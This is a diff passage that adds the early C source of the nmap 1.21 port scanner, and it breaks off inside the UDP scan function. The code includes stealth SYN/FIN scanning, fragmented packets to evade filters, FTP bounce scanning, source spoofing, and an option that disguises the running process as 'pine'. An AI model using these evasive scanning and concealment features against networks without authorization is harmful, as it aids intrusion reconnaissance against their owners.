+
+[ The code ]
+
+This should compile fine on any Linux box with 'gcc -O6 -o nmap nmap.c -lm'.
+It is distrubuted under the terms of the GNU GENERAL PUBLIC LICENSE.  If you
+have problems or comments, feel free to mail me (fyodor@dhp.com).
+
+<++> nmap/Makefile
+# A trivial makefile for Network Mapper
+nmap: nmap.c nmap.h
+	gcc -Wall -O6 -o nmap nmap.c -lm
+<-->
+
+<++> nmap/nmap.h
+#ifndef NMAP_H
+#define NMAP_H
+
+/************************INCLUDES**********************************/
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <rpc/types.h>
+#include <sys/socket.h>
+#include <sys/socket.h> 
+#include <sys/stat.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <time.h>
+#include <fcntl.h>
+#include <signal.h> 
+#include <signal.h>
+#include <linux/ip.h> /*<netinet/ip.h>*/
+#include <linux/icmp.h> /*<netinet/ip_icmp.h>*/
+#include <arpa/inet.h>
+#include <math.h>
+#include <time.h>
+#include <sys/time.h> 
+#include <asm/byteorder.h>
+#include <netinet/ip_tcp.h>
+
+/************************DEFINES************************************/
+
+/* #define to zero if you don't want to	ignore hosts of the form 
+   xxx.xxx.xxx.{0,255} (usually network and broadcast addresses) */
+#define IGNORE_ZERO_AND_255_HOSTS 1
+
+#define DEBUGGING 0
+
+/* Default number of ports in paralell.  Doesn't always involve actual 
+   sockets.  Can also adjust with the -M command line option.  */
+#define MAX_SOCKETS 36 
+/* If reads of a UDP port keep returning EAGAIN (errno 13), do we want to 
+   count the port as valid? */
+#define RISKY_UDP_SCAN 0
+ /* This ideally should be a port that isn't in use for any protocol on our machine or on the target */ 
+#define MAGIC_PORT 49724
+/* How many udp sends without a ICMP port unreachable error does it take before we consider the port open? */
+#define UDP_MAX_PORT_RETRIES 4
+ /*How many seconds before we give up on a host being alive? */
+#define PING_TIMEOUT 2
+#define FAKE_ARGV "pine" /* What ps and w should show if you use -q */
+/* How do we want to log into ftp sites for */ 
+#define FTPUSER "anonymous"
+#define FTPPASS "-wwwuser@"
+#define FTP_RETRIES 2 /* How many times should we relogin if we lose control
+                         connection? */
+
+#define UC(b)   (((int)b)&0xff)
+#define MORE_FRAGMENTS 8192 /*NOT a user serviceable parameter*/
+#define fatal(x) { fprintf(stderr, "%s\n", x); exit(-1); }
+#define error(x) fprintf(stderr, "%s\n", x);
+
+/***********************STRUCTURES**********************************/
+
+typedef struct port {
+  unsigned short portno;
+  unsigned char proto;
+  char *owner;
+  struct port *next;
+} port;
+
+struct ftpinfo {
+  char user[64];
+  char pass[256]; /* methinks you're paranoid if you need this much space */
+  char server_name[MAXHOSTNAMELEN + 1];
+  struct in_addr server;
+  unsigned short port;
+  int sd; /* socket descriptor */
+};
+
+typedef port *portlist;
+
+/***********************PROTOTYPES**********************************/
+
+/* print usage information */
+void printusage(char *name);
+
+/* our scanning functions */
+portlist tcp_scan(struct in_addr target, unsigned short *portarray, 
+		  portlist *ports);
+portlist syn_scan(struct in_addr target, unsigned short *portarray,
+		  struct in_addr *source, int fragment, portlist *ports);
+portlist fin_scan(struct in_addr target, unsigned short *portarray,
+		  struct in_addr *source, int fragment, portlist *ports);
+portlist udp_scan(struct in_addr target, unsigned short *portarray,
+		  portlist *ports);
+portlist lamer_udp_scan(struct in_addr target, unsigned short *portarray,
+			portlist *ports);
+portlist bounce_scan(struct in_addr target, unsigned short *portarray,
+		     struct ftpinfo *ftp, portlist *ports);
+
+/* Scan helper functions */
+unsigned long calculate_sleep(struct in_addr target);
+int check_ident_port(struct in_addr target);
+int getidentinfoz(struct in_addr target, int localport, int remoteport,
+		  char *owner);
+int parse_bounce(struct ftpinfo *ftp, char *url);
+int ftp_anon_connect(struct ftpinfo *ftp);
+
+/* port manipulators */
+unsigned short *getpts(char *expr); /* someone stole the name getports()! */
+unsigned short *getfastports(int tcpscan, int udpscan);
+int addport(portlist *ports, unsigned short portno, unsigned short protocol,
+	    char *owner);
+int deleteport(portlist *ports, unsigned short portno, unsigned short protocol);
+void printandfreeports(portlist ports);
+int shortfry(unsigned short *ports);
+
+/* socket manipulation functions */
+void init_socket(int sd);
+int unblock_socket(int sd);
+int block_socket(int sd);
+int recvtime(int sd, char *buf, int len, int seconds);
+
+/* RAW packet building/dissasembling stuff */
+int send_tcp_raw( int sd, struct in_addr *source, 
+		  struct in_addr *victim, unsigned short sport, 
+		  unsigned short dport, unsigned long seq,
+		  unsigned long ack, unsigned char flags,
+		  unsigned short window, char *data,
+		  unsigned short datalen);
+int isup(struct in_addr target);
+unsigned short in_cksum(unsigned short *ptr,int nbytes);
+int send_small_fragz(int sd, struct in_addr *source, struct in_addr *victim,
+		     int sport, int dport, int flags);
+int readtcppacket(char *packet, int readdata);
+int listen_icmp(int icmpsock, unsigned short outports[],
+		unsigned short numtries[], int *num_out,
+		struct in_addr target, portlist *ports);
+
+/* general helper functions */
+void hdump(unsigned char *packet, int len);
+void *safe_malloc(int size);
+#endif /* NMAP_H */
+<-->
+
+<++> nmap/nmap.c
+
+#include "nmap.h"
+
+/* global options */
+short debugging = DEBUGGING;
+short verbose = 0;
+int number_of_ports  = 0; /* How many ports do we scan per machine? */
+int max_parallel_sockets = MAX_SOCKETS;
+extern char *optarg;
+extern int optind;
+short isr00t = 0;
+short identscan = 0;
+char current_name[MAXHOSTNAMELEN + 1];
+unsigned long global_delay = 0;
+unsigned long global_rtt = 0;
+struct in_addr ouraddr = { 0 };
+
+int main(int argc, char *argv[]) {
+int i, j, arg, argvlen;
+short fastscan=0, tcpscan=0, udpscan=0, synscan=0, randomize=0;
+short fragscan = 0, finscan = 0, quashargv = 0, pingscan = 0, lamerscan = 0;
+short bouncescan = 0;
+short *ports = NULL, mask;
+struct ftpinfo ftp = { FTPUSER, FTPPASS, "", { 0 }, 21, 0};
+portlist openports = NULL;
+struct hostent *target = 0;
+unsigned long int lastip, currentip, longtmp;
+char *target_net, *p;
+struct in_addr current_in, *source=NULL;
+int hostup = 0;
+char *fakeargv[argc + 1];
+
+/* argv faking silliness */
+for(i=0; i < argc; i++) {
+  fakeargv[i] = safe_malloc(strlen(argv[i]) + 1);
+  strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1);
+}
+fakeargv[argc] = NULL;
+
+if (argc < 2 ) printusage(argv[0]);
+
+/* OK, lets parse these args! */
+while((arg = getopt(argc,fakeargv,"b:dFfhilM:Pp:qrS:stUuw:v")) != EOF) {
+  switch(arg) {
+  case 'b': 
+    bouncescan++;
+    if (parse_bounce(&ftp, optarg) < 0 ) {
+      fprintf(stderr, "Your argument to -b is fucked up. Use the normal url style:  user:pass@server:port or just use server and use default anon login\n  Use -h for help\n");
+    }
+    break;
+  case 'd': debugging++; break;
+  case 'F': fastscan++; break;
+  case 'f': fragscan++; break;
+  case 'h': 
+  case '?': printusage(argv[0]);
+  case 'i': identscan++; break;
+  case 'l': lamerscan++; udpscan++; break;
+  case 'M': max_parallel_sockets = atoi(optarg); break;
+  case 'P': pingscan++; break;
+  case 'p': 
+    if (ports)
+      fatal("Only 1 -p option allowed, seperate multiple ranges with commas.");
+    ports = getpts(optarg); break;
+  case 'r': randomize++; break;
+  case 's': synscan++; break;
+  case 'S': 
+    if (source)
+      fatal("You can only use the source option once!\n");
+    source = safe_malloc(sizeof(struct in_addr));
+    if (!inet_aton(optarg, source))
+      fatal("You must give the source address in dotted deciman, currently.\n");
+    break;
+  case 't': tcpscan++; break;
+  case 'U': finscan++; break;
+  case 'u': udpscan++; break;
+  case 'q': quashargv++; break;
+  case 'w': global_delay = atoi(optarg); break;
+  case 'v': verbose++;
+  }
+}
+
+/* Take care of user wierdness */
+isr00t = !(geteuid()|geteuid());
+if (tcpscan && synscan) 
+  fatal("The -t and -s options can't be used together.\
+ If you are trying to do TCP SYN scanning, just use -s.\
+ For normal connect() style scanning, use -t");
+if ((synscan || finscan || fragscan || pingscan) && !isr00t)
+  fatal("Options specified require r00t privileges.  You don't have them!");
+if (!tcpscan && !udpscan && !synscan && !finscan && !bouncescan && !pingscan) {
+  tcpscan++;
+  if (verbose) error("No scantype specified, assuming vanilla tcp connect()\
+ scan. Use -P if you really don't want to portscan.");
+if (fastscan && ports)
+  fatal("You can use -F (fastscan) OR -p for explicit port specification.\
+  Not both!\n");
+}
+/* If he wants to bounce of an ftp site, that site better damn well be reachable! */
+if (bouncescan) {
+  if (!inet_aton(ftp.server_name, &ftp.server)) {
+    if ((target = gethostbyname(ftp.server_name)))
+      memcpy(&ftp.server, target->h_addr_list[0], 4);
+    else {
+      fprintf(stderr, "Failed to resolve ftp bounce proxy hostname/IP: %s\n",
+	      ftp.server_name);
+      exit(1);
+    } 
+  }  else if (verbose)
+    printf("Resolved ftp bounce attack proxy to %s (%s).\n", 
+	   target->h_name, inet_ntoa(ftp.server)); 
+}
+printf("\nStarting nmap V 1.21 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/\n");
+if (!verbose) 
+  error("Hint: The -v option notifies you of open ports as they are found.\n");
+if (fastscan)
+  ports = getfastports(synscan|tcpscan|fragscan|finscan|bouncescan,
+                       udpscan|lamerscan);
+if (!ports) ports = getpts("1-1024");
+
+/* more fakeargv junk, BTW malloc'ing extra space in argv[0] doesn't work */
+if (quashargv) {
+  argvlen = strlen(argv[0]);
+  if (argvlen < strlen(FAKE_ARGV))
+    fatal("If you want me to fake your argv, you need to call the program with a longer name.  Try the full pathname, or rename it fyodorssuperdedouperportscanner");
+  strncpy(argv[0], FAKE_ARGV, strlen(FAKE_ARGV));
+  for(i = strlen(FAKE_ARGV); i < argvlen; i++) argv[0][i] = '\0';
+  for(i=1; i < argc; i++) {
+    argvlen = strlen(argv[i]);
+    for(j=0; j <= argvlen; j++)
+      argv[i][j] = '\0';
+  }
+}
+
+srand(time(NULL));
+
+while(optind < argc) {
+  
+  /* Time to parse the allowed mask */
+  target = NULL;
+  target_net = strtok(strdup(fakeargv[optind]), "/");
+  mask = (p = strtok(NULL,""))? atoi(p) : 32;
+  if (debugging)
+    printf("Target network is %s, scanmask is %d\n", target_net, mask);
+  
+  if (!inet_aton(target_net, &current_in)) {
+    if ((target = gethostbyname(target_net)))
+      memcpy(&currentip, target->h_addr_list[0], 4);
+    else {
+      fprintf(stderr, "Failed to resolve given hostname/IP: %s\n", target_net);
+    }
+  } else currentip = current_in.s_addr;
+
+  longtmp = ntohl(currentip);
+  currentip = longtmp & (unsigned long) (0 - pow(2,32 - mask));
+  lastip = longtmp | (unsigned long) (pow(2,32 - mask) - 1);
+  while (currentip <= lastip) {
+    openports = NULL;
+    longtmp = htonl(currentip);
+    target = gethostbyaddr((char *) &longtmp, 4, AF_INET);
+    current_in.s_addr = longtmp;
+    if (target)
+      strncpy(current_name, target->h_name, MAXHOSTNAMELEN);
+    else current_name[0] = '\0';
+    current_name[MAXHOSTNAMELEN + 1] = '\0';
+    if (randomize)
+      shortfry(ports); 
+#ifdef IGNORE_ZERO_AND_255_HOSTS
+    if (IGNORE_ZERO_AND_255_HOSTS 
+	&& (!(currentip % 256) || currentip % 256 == 255))
+      {
+	printf("Skipping host %s because IGNORE_ZERO_AND_255_HOSTS is set in the source.\n", inet_ntoa(current_in));
+	hostup = 0;
+      }
+    else{
+#endif
+      if (isr00t) {
+	if (!(hostup = isup(current_in))) {
+	  if (!pingscan)
+	    printf("Host %s (%s) appears to be down, skipping scan.\n",
+		   current_name, inet_ntoa(current_in));
+	  else
+	    printf("Host %s (%s) appears to be  down\n",
+		   current_name, inet_ntoa(current_in));
+	} else if (debugging || pingscan)
+	  printf("Host %s (%s) appears to be up ... good.\n",
+                 current_name, inet_ntoa(current_in));
+      }
+      else hostup = 1; /* We don't really check because the lamer isn't root.*/
+    }
+    
+    /* Time for some actual scanning! */    
+    if (hostup) {
+      if (tcpscan) tcp_scan(current_in, ports, &openports);
+      
+      if (synscan) syn_scan(current_in, ports, source, fragscan, &openports);
+      
+      if (finscan) fin_scan(current_in, ports, source, fragscan, &openports);
+      
+      if (bouncescan) {
+	if (ftp.sd <= 0) ftp_anon_connect(&ftp);
+	if (ftp.sd > 0) bounce_scan(current_in, ports, &ftp, &openports);
+	  }
+      if (udpscan) {
+	if (!isr00t || lamerscan) 
+	  lamer_udp_scan(current_in, ports, &openports);
+
+	else udp_scan(current_in, ports, &openports);
+      }
+    
+      if (!openports && !pingscan)
+	printf("No ports open for host %s (%s)\n", current_name,
+	       inet_ntoa(current_in));
+      if (openports) {
+	printf("Open ports on %s (%s):\n", current_name, 
+	       inet_ntoa(current_in));
+	printandfreeports(openports);
+      }
+    }
+    currentip++;
+  }
+  optind++;
+}
+
+return 0;
+}
+
+__inline__ int unblock_socket(int sd) {
+int options;
+/*Unblock our socket to prevent recvfrom from blocking forever 
+  on certain target ports. */
+options = O_NONBLOCK | fcntl(sd, F_GETFL);
+fcntl(sd, F_SETFL, options);
+return 1;
+}
+
+__inline__ int block_socket(int sd) {
+int options;
+options = (~O_NONBLOCK) & fcntl(sd, F_GETFL);
+fcntl(sd, F_SETFL, options);
+return 1;
+}
+
+/* Currently only sets SO_LINGER, I haven't seen any evidence that this
+   helps.  I'll do more testing before dumping it. */
+__inline__ void init_socket(int sd) {
+struct linger l;
+
+l.l_onoff = 1;
+l.l_linger = 0;
+
+if (setsockopt(sd, SOL_SOCKET, SO_LINGER,  &l, sizeof(struct linger)))
+  {
+   fprintf(stderr, "Problem setting socket SO_LINGER, errno: %d\n", errno);
+   perror("setsockopt");
+  }
+}
+
+/* Convert a string like "-100,200-1024,3000-4000,60000-" into an array 
+   of port numbers*/
+unsigned short *getpts(char *origexpr) {
+int exlen = strlen(origexpr);
+char *p,*q;
+unsigned short *tmp, *ports;
+int i=0, j=0,start,end;
+char *expr = strdup(origexpr);
+ports = safe_malloc(65536 * sizeof(short));
+i++;
+i--;
+for(;j < exlen; j++) 
+  if (expr[j] != ' ') expr[i++] = expr[j]; 
+expr[i] = '\0';
+exlen = i + 1;
+i=0;
+while((p = strchr(expr,','))) {
+  *p = '\0';
+  if (*expr == '-') {start = 1; end = atoi(expr+ 1);}
+  else {
+    start = end = atoi(expr);
+    if ((q = strchr(expr,'-')) && *(q+1) ) end = atoi(q + 1);
+    else if (q && !*(q+1)) end = 65535;
+  }
+  if (debugging)
+    printf("The first port is %d, and the last one is %d\n", start, end);
+  if (start < 1 || start > end) fatal("Your port specifications are illegal!");
+  for(j=start; j <= end; j++) 
+    ports[i++] = j;
+  expr = p + 1;
+}
+if (*expr == '-') {
+  start = 1;
+  end = atoi(expr+ 1);
+}
+else {
+  start = end = atoi(expr);
+  if ((q =  strchr(expr,'-')) && *(q+1) ) end = atoi(q+1);
+  else if (q && !*(q+1)) end = 65535;
+}
+if (debugging)
+  printf("The first port is %d, and the last one is %d\n", start, end);
+if (start < 1 || start > end) fatal("Your port specifications are illegal!");
+for(j=start; j <= end; j++) 
+  ports[i++] = j;
+number_of_ports = i;
+ports[i++] = 0;
+tmp = realloc(ports, i * sizeof(short));
+  free(expr);
+  return tmp;
+}
+
+unsigned short *getfastports(int tcpscan, int udpscan) {
+  int portindex = 0, res, lastport = 0;
+  unsigned int portno = 0;
+  unsigned short *ports;
+  char proto[10];
+  char line[81];
+  FILE *fp;
+  ports = safe_malloc(65535 * sizeof(unsigned short));
+  proto[0] = '\0';
+  if (!(fp = fopen("/etc/services", "r"))) {
+    printf("We can't open /etc/services for reading!  Fix your system or don't use -f\n");
+    perror("fopen");
+    exit(1);
+  }
+  
+  while(fgets(line, 80, fp)) {
+    res = sscanf(line, "%*s %u/%s", &portno, proto);
+    if (res == 2 && portno != 0 && portno != lastport) { 
+      lastport = portno;
+      if (tcpscan && proto[0] == 't')
+	ports[portindex++] = portno;
+      else if (udpscan && proto[0] == 'u')
+	ports[portindex++] = portno;
+    }
+  }
+
+
+number_of_ports = portindex;
+ports[portindex++] = 0;
+return realloc(ports, portindex * sizeof(unsigned short));
+}
+
+void printusage(char *name) {
+printf("%s [options] [hostname[/mask] . . .]
+options (none are required, most can be combined):
+   -t tcp connect() port scan
+   -s tcp SYN stealth port scan (must be root)
+   -u UDP port scan, will use MUCH better version if you are root
+   -U Uriel Maimon (P49-15) style FIN stealth scan.
+   -l Do the lamer UDP scan even if root.  Less accurate.
+   -P ping \"scan\". Find which hosts on specified network(s) are up.
+   -b <ftp_relay_host> ftp \"bounce attack\" port scan
+   -f use tiny fragmented packets for SYN or FIN scan.
+   -i Get identd (rfc 1413) info on listening TCP processes.
+   -p <range> ports: ex: \'-p 23\' will only try port 23 of the host(s)
+                  \'-p 20-30,63000-\' scans 20-30 and 63000-65535 default: 1-1024
+   -F fast scan. Only scans ports in /etc/services, a la strobe(1).
+   -r randomize target port scanning order.
+   -h help, print this junk.  Also see http://www.dhp.com/~fyodor/nmap/
+   -S If you want to specify the source address of SYN or FYN scan.
+   -v Verbose.  Its use is recommended.  Use twice for greater effect.
+   -w <n> delay.  n microsecond delay. Not recommended unless needed.
+   -M <n> maximum number of parallel sockets.  Larger isn't always better.
+   -q quash argv to something benign, currently set to \"%s\".
+Hostnames specified as internet hostname or IP address.  Optional '/mask' specifies subnet. cert.org/24 or 192.88.209.5/24 scan CERT's Class C.\n", 
+       name, FAKE_ARGV);
+exit(1);
+}
+
+portlist tcp_scan(struct in_addr target, unsigned short *portarray, portlist *ports) {
+
+int starttime, current_out = 0, res , deadindex = 0, i=0, j=0, k=0, max=0; 
+struct sockaddr_in sock, stranger, mysock;
+int sockaddr_in_len = sizeof(struct sockaddr_in);
+int sockets[max_parallel_sockets], deadstack[max_parallel_sockets];
+unsigned short portno[max_parallel_sockets];
+char owner[513], buf[65536]; 
+int tryident = identscan, current_socket /*actually it is a socket INDEX*/;
+fd_set fds_read, fds_write;
+struct timeval nowait = {0,0},  longwait = {7,0}; 
+
+signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE so our 'write 0 bytes' test
+			     doesn't crash our program!*/
+owner[0] = '\0';
+starttime = time(NULL);
+bzero((char *)&sock,sizeof(struct sockaddr_in));
+sock.sin_addr.s_addr = target.s_addr;
+if (verbose || debugging)
+  printf("Initiating TCP connect() scan against %s (%s)\n",
+	 current_name,  inet_ntoa(sock.sin_addr));
+sock.sin_family=AF_INET;
+FD_ZERO(&fds_read);
+FD_ZERO(&fds_write);
+
+if (tryident)
+  tryident = check_ident_port(target);
+
+/* Initially, all of our sockets are "dead" */
+for(i = 0 ; i < max_parallel_sockets; i++) {
+  deadstack[deadindex++] = i;
+  portno[i] = 0;
+}
+
+deadindex--; 
+/* deadindex always points to the most recently added dead socket index */
+
+while(portarray[j]) {
+  longwait.tv_sec = 7;
+  longwait.tv_usec = nowait.tv_sec = nowait.tv_usec = 0;
+  
+  for(i=current_out; i < max_parallel_sockets && portarray[j]; i++, j++) {
+    current_socket = deadstack[deadindex--];
+    if ((sockets[current_socket] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
+      {perror("Socket troubles"); exit(1);}
+    if (sockets[current_socket] > max) max = sockets[current_socket]; 
+    current_out++;
+    unblock_socket(sockets[current_socket]);
+    init_socket(sockets[current_socket]);
+    portno[current_socket] = portarray[j];
+    sock.sin_port = htons(portarray[j]);
+    if ((res = connect(sockets[current_socket],(struct sockaddr *)&sock,sizeof(struct sockaddr)))!=-1)
+      printf("WTF???? I think we got a successful connection in non-blocking!!@#$\n");
+    else {
+      switch(errno) {
+      case EINPROGRESS: /* The one I always see */
+      case EAGAIN:
+	block_socket(sockets[current_socket]);
+	FD_SET(sockets[current_socket], &fds_write);
+	FD_SET(sockets[current_socket], &fds_read);
+	break;
+      default:
+	printf("Strange error from connect: (%d)", errno);
+	perror(""); /*falling through intentionally*/
+      case ECONNREFUSED:
+	if (max == sockets[current_socket]) max--;
+	deadstack[++deadindex] = current_socket;
+	current_out--;
+	portno[current_socket] = 0;
+	close(sockets[current_socket]);
+	break;
+      }
+    }
+  }
+  if (!portarray[j]) sleep(1); /*wait a second for any last packets*/
+  while((res = select(max + 1, &fds_read, &fds_write, NULL, 
+		      (current_out < max_parallel_sockets)?
+		      &nowait : &longwait)) > 0) {
+    for(k=0; k < max_parallel_sockets; k++)
+      if (portno[k]) {
+	if (FD_ISSET(sockets[k], &fds_write)
+	    && FD_ISSET(sockets[k], &fds_read)) {
+	  /*printf("Socket at port %hi is selectable for r & w.", portno[k]);*/
+	  res = recvfrom(sockets[k], buf, 65536, 0, (struct sockaddr *)
+			 & stranger, &sockaddr_in_len);
+	  if (res >= 0) {
+	    if (debugging || verbose)
+	      printf("Adding TCP port %hi due to successful read.\n", 
+		     portno[k]);
+	    if (tryident) {
+	      if ( getsockname(sockets[k], (struct sockaddr *) &mysock,
+			       &sockaddr_in_len ) ) {
+		perror("getsockname");
+		exit(1);
+	      }
+	      tryident = getidentinfoz(target, ntohs(mysock.sin_port),
+				       portno[k], owner);
+	    }	    
+	    addport(ports, portno[k], IPPROTO_TCP, owner);
+	  }
+	  if (max == sockets[k])
+	    max--;
+	  FD_CLR(sockets[k], &fds_read);
+	  FD_CLR(sockets[k], &fds_write);
+	  deadstack[++deadindex] = k;
+	  current_out--;
+	  portno[k] = 0;
+	  close(sockets[k]);
+	}
+	else if(FD_ISSET(sockets[k], &fds_write)) {
+	  /*printf("Socket at port %hi is selectable for w only.VERIFYING\n",
+	    portno[k]);*/
+	  res = send(sockets[k], buf, 0, 0);
+	  if (res < 0 ) {
+	    signal(SIGPIPE, SIG_IGN);
+	    if (debugging > 1)
+	      printf("Bad port %hi caught by 0-byte write!\n", portno[k]);
+	  }
+	  else {
+	    if (debugging || verbose)
+	      printf("Adding TCP port %hi due to successful 0-byte write!\n",
+		     portno[k]);
+	    if (tryident) {
+	      if ( getsockname(sockets[k], (struct sockaddr *) &mysock ,
+			       &sockaddr_in_len ) ) {
+		perror("getsockname");
+		exit(1);
+	      }
+	      tryident = getidentinfoz(target, ntohs(mysock.sin_port),
+				       portno[k], owner);
+	    }	    
+	    addport(ports, portno[k], IPPROTO_TCP, owner);	 
+	  }
+	  if (max == sockets[k]) max--;
+	  FD_CLR(sockets[k], &fds_write);
+	  deadstack[++deadindex] = k;
+	  current_out--;
+	  portno[k] = 0;
+	  close(sockets[k]);
+	}
+	else if ( FD_ISSET(sockets[k], &fds_read) ) {       
+	  printf("Socket at port %hi is selectable for r only.  This is very wierd.\n", portno[k]);
+	  if (max == sockets[k]) max--;
+	  FD_CLR(sockets[k], &fds_read);
+	  deadstack[++deadindex] = k;
+	  current_out--;
+	  portno[k] = 0;
+	  close(sockets[k]);
+	}
+	else {
+	  /*printf("Socket at port %hi not selecting, readding.\n",portno[k]);*/
+	  FD_SET(sockets[k], &fds_write);
+	  FD_SET(sockets[k], &fds_read);
+	}
+      }
+  }
+}
+
+if (debugging || verbose) 
+  printf("Scanned %d ports in %ld seconds with %d parallel sockets.\n",
+	 number_of_ports, time(NULL) - starttime, max_parallel_sockets);
+return *ports;
+}
+
+/* gawd, my next project will be in c++ so I don't have to deal with
+   this crap ... simple linked list implementation */
+int addport(portlist *ports, unsigned short portno, unsigned short protocol,
+	    char *owner) {
+struct port *current, *tmp;
+int len;
+
+if (*ports) {
+  current = *ports;
+  /* case 1: we add to the front of the list */
+  if (portno <= current->portno) {
+    if (current->portno == portno && current->proto == protocol) {
+      if (debugging || verbose) 
+	printf("Duplicate port (%hi/%s)\n", portno , 
+	       (protocol == IPPROTO_TCP)? "tcp": "udp");
+      return -1;
+    }  
+    tmp = current;
+    *ports = safe_malloc(sizeof(struct port));
+    (*ports)->next = tmp;
+    current = *ports;
+    current->portno = portno;
+    current->proto = protocol;
+    if (owner && *owner) {
+      len = strlen(owner);
+      current->owner = malloc(sizeof(char) * (len + 1));
+      strncpy(current->owner, owner, len + 1);
+    }
+    else current->owner = NULL;
+  }
+  else { /* case 2: we add somewhere in the middle or end of the list */
+    while( current->next  && current->next->portno < portno)
+      current = current->next;
+    if (current->next && current->next->portno == portno 
+	&& current->next->proto == protocol) {
+      if (debugging || verbose) 
+	printf("Duplicate port (%hi/%s)\n", portno , 
+	       (protocol == IPPROTO_TCP)? "tcp": "udp");
+      return -1;
+    }
+    tmp = current->next;
+    current->next = safe_malloc(sizeof(struct port));
+    current->next->next = tmp;
+    tmp = current->next;
+    tmp->portno = portno;
+    tmp->proto = protocol;
+    if (owner && *owner) {
+      len = strlen(owner);
+      tmp->owner = malloc(sizeof(char) * (len + 1));
+      strncpy(tmp->owner, owner, len + 1);
+    }
+    else tmp->owner = NULL;
+  }
+}
+
+else { /* Case 3, list is null */
+  *ports = safe_malloc(sizeof(struct port));
+  tmp = *ports;
+  tmp->portno = portno;
+  tmp->proto = protocol;
+  if (owner && *owner) {
+    len = strlen(owner);
+    tmp->owner = safe_malloc(sizeof(char) * (len + 1));
+    strncpy(tmp->owner, owner, len + 1);
+  }
+  else tmp->owner = NULL;
+  tmp->next = NULL;
+}
+return 0; /*success */
+}
+
+int deleteport(portlist *ports, unsigned short portno,
+	       unsigned short protocol) {
+  portlist current, tmp;
+  
+  if (!*ports) {
+    if (debugging > 1) error("Tried to delete from empty port list!");
+    return -1;
+  }
+  /* Case 1, deletion from front of list*/
+  if ((*ports)->portno == portno && (*ports)->proto == protocol) {
+    tmp = (*ports)->next;
+    if ((*ports)->owner) free((*ports)->owner);
+    free(*ports);
+    *ports = tmp;
+  }
+  else {
+    current = *ports;
+    for(;current->next && (current->next->portno != portno || current->next->proto != protocol); current = current->next);
+    if (!current->next)
+      return -1;
+    tmp = current->next;
+    current->next = tmp->next;
+    if (tmp->owner) free(tmp->owner);
+    free(tmp);
+}
+  return 0; /* success */
+}
+
+
+void *safe_malloc(int size)
+{
+  void *mymem;
+  if (size < 0)
+    fatal("Tried to malloc negative amount of memmory!!!");
+  if ((mymem = malloc(size)) == NULL)
+    fatal("Malloc Failed! Probably out of space.");
+  return mymem;
+}
+
+void printandfreeports(portlist ports) {
+  char protocol[4];
+  struct servent *service;
+  port *current = ports, *tmp;
+  
+  printf("Port Number  Protocol  Service");
+  printf("%s", (identscan)?"         Owner\n":"\n");
+  while(current != NULL) {
+    strcpy(protocol,(current->proto == IPPROTO_TCP)? "tcp": "udp");
+    service = getservbyport(htons(current->portno), protocol);
+    printf("%-13d%-11s%-16s%s\n", current->portno, protocol,
+	   (service)? service->s_name: "unknown",
+	   (current->owner)? current->owner : "");
+    tmp = current;
+    current = current->next;
+    if (tmp->owner) free(tmp->owner);
+    free(tmp);
+  }
+  printf("\n");
+}
+
+/* This is the version of udp_scan that uses raw ICMP sockets and requires 
+   root priviliges.*/
+portlist udp_scan(struct in_addr target, unsigned short *portarray,
+		  portlist *ports) {
+  int icmpsock, udpsock, tmp, done=0, retries, bytes = 0, res,  num_out = 0;
+  int i=0,j=0, k=0, icmperrlimittime, max_tries = UDP_MAX_PORT_RETRIES;
+  unsigned short outports[max_parallel_sockets], numtries[max_parallel_sockets];
+  struct sockaddr_in her;
+  char senddata[] = "blah\n";
+  unsigned long starttime, sleeptime;
+  struct timeval shortwait = {1, 0 };
+  fd_set  fds_read, fds_write;
+  
+  bzero(outports, max_parallel_sockets * sizeof(unsigned short));
+  bzero(numtries, max_parallel_sockets * sizeof(unsigned short));
+  
+   /* Some systems (like linux) follow the advice of rfc1812 and limit
+    * the rate at which they will respons with icmp error messages 
+    * (like port unreachable).  icmperrlimittime is to compensate for that.
+    */
+  icmperrlimittime = 60000;
+
+  sleeptime = (global_delay)? global_delay : (global_rtt)? (1.2 * global_rtt) + 30000 : 1e5;
+if (global_delay) icmperrlimittime = global_delay;
+
+starttime = time(NULL);
+
+FD_ZERO(&fds_read);
+FD_ZERO(&fds_write);
+
+if (verbose || debugging)
+  printf("Initiating UDP (raw ICMP version) scan against %s (%s) using wait delay of %li usecs.\n", current_name,  inet_ntoa(target), sleeptime);
+
+if ((icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0)
+  perror("Opening ICMP RAW socket");
+if ((udpsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
+  perror("Opening datagram socket");
+
+unblock_socket(icmpsock);
+her.sin_addr = target;
+her.sin_family = AF_INET;
+
+while(!done) {
+  tmp = num_out;
+  for(i=0; (i < max_parallel_sockets && portarray[j]) || i < tmp; i++) {
+    close(udpsock);
+    if ((udpsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
+      perror("Opening datagram socket");
+    if ((i > tmp && portarray[j]) || numtries[i] > 1) {
+      if (i > tmp) her.sin_port = htons(portarray[j++]);
+      else her.sin_port = htons(outports[i]);
+      FD_SET(udpsock, &fds_write);
+      FD_SET(icmpsock, &fds_read);
+      shortwait.tv_sec = 1; shortwait.tv_usec = 0;
+      usleep(icmperrlimittime);
+      res = select(udpsock + 1, NULL, &fds_write, NULL, &shortwait);
+       if (FD_ISSET(udpsock, &fds_write))
+	  bytes = sendto(udpsock, senddata, sizeof(senddata), 0,
+			 (struct sockaddr *) &her, sizeof(struct sockaddr_in));
+      else {
+	printf("udpsock not set for writing port %d!",  ntohs(her.sin_port));
+	return *ports;
+      }
+      if (bytes <= 0) {
+	if (errno == ECONNREFUSED) {
+	  retries = 10;
+	  do {	  
+	    /* This is from when I was using the same socket and would 
+	     * (rather often) get strange connection refused errors, it
+	     * shouldn't happen now that I create a new udp socket for each
+	     * port.  At some point I will probably go back to 1 socket again.
+	     */
+	    printf("sendto said connection refused on port %d but trying again anyway.\n", ntohs(her.sin_port));
+	    usleep(icmperrlimittime);
+	    bytes = sendto(udpsock, senddata, sizeof(senddata), 0,
+			  (struct sockaddr *) &her, sizeof(struct sockaddr_in));
+	    printf("This time it returned %d\n", bytes);
+	  } while(bytes <= 0 && retries-- > 0);
+	}
